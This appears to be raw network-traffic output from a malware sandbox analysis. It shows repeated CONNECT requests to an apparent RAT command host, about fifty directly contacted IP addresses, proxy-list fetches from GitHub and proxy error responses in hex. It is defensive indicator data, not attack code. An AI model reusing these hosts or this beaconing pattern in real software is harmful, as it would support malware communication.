Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 197.234.13.97
Source: unknown	TCP traffic detected without corresponding DNS query: 154.73.29.1
Source: unknown	TCP traffic detected without corresponding DNS query: 50.231.104.58
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.158.204
Source: unknown	TCP traffic detected without corresponding DNS query: 51.222.241.8
Source: unknown	TCP traffic detected without corresponding DNS query: 177.38.5.42
Source: unknown	TCP traffic detected without corresponding DNS query: 206.189.145.23
Source: unknown	TCP traffic detected without corresponding DNS query: 212.102.47.83
Source: unknown	TCP traffic detected without corresponding DNS query: 101.255.165.130
Source: unknown	TCP traffic detected without corresponding DNS query: 211.174.114.225
Source: unknown	TCP traffic detected without corresponding DNS query: 124.223.186.186
Source: unknown	TCP traffic detected without corresponding DNS query: 1.20.184.75
Source: unknown	TCP traffic detected without corresponding DNS query: 119.3.215.41
Source: unknown	TCP traffic detected without corresponding DNS query: 212.237.218.68
Source: unknown	TCP traffic detected without corresponding DNS query: 41.60.232.18
Source: unknown	TCP traffic detected without corresponding DNS query: 197.234.13.27
Source: unknown	TCP traffic detected without corresponding DNS query: 190.97.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 27.123.1.35
Source: unknown	TCP traffic detected without corresponding DNS query: 51.250.13.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.216.144.170
Source: unknown	TCP traffic detected without corresponding DNS query: 84.36.23.44
Source: unknown	TCP traffic detected without corresponding DNS query: 83.143.24.66
Source: unknown	TCP traffic detected without corresponding DNS query: 45.65.138.48
Source: unknown	TCP traffic detected without corresponding DNS query: 41.33.203.231
Source: unknown	TCP traffic detected without corresponding DNS query: 86.206.214.11
Source: unknown	TCP traffic detected without corresponding DNS query: 186.103.130.94
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.194.40
Source: unknown	TCP traffic detected without corresponding DNS query: 94.131.63.120
Source: unknown	TCP traffic detected without corresponding DNS query: 186.96.95.205
Source: unknown	TCP traffic detected without corresponding DNS query: 150.230.96.150
Source: unknown	TCP traffic detected without corresponding DNS query: 209.14.112.3
Source: unknown	TCP traffic detected without corresponding DNS query: 177.131.29.213
Source: unknown	TCP traffic detected without corresponding DNS query: 131.100.48.233
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.104.12
Source: unknown	TCP traffic detected without corresponding DNS query: 203.96.177.211
Source: unknown	TCP traffic detected without corresponding DNS query: 188.165.213.106
Source: unknown	TCP traffic detected without corresponding DNS query: 223.113.89.138
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.19.131
Source: unknown	TCP traffic detected without corresponding DNS query: 104.25.167.88
Source: unknown	TCP traffic detected without corresponding DNS query: 103.5.127.213
Source: unknown	TCP traffic detected without corresponding DNS query: 165.227.196.37
Source: unknown	TCP traffic detected without corresponding DNS query: 103.178.194.190
Source: unknown	TCP traffic detected without corresponding DNS query: 61.129.2.212
Source: unknown	TCP traffic detected without corresponding DNS query: 47.243.177.21
Source: unknown	TCP traffic detected without corresponding DNS query: 41.65.236.37
Source: unknown	TCP traffic detected without corresponding DNS query: 18.144.77.146
Source: unknown	TCP traffic detected without corresponding DNS query: 198.49.68.80

Source: global traffic	HTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: github.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:12 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:12 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:12 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:12 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
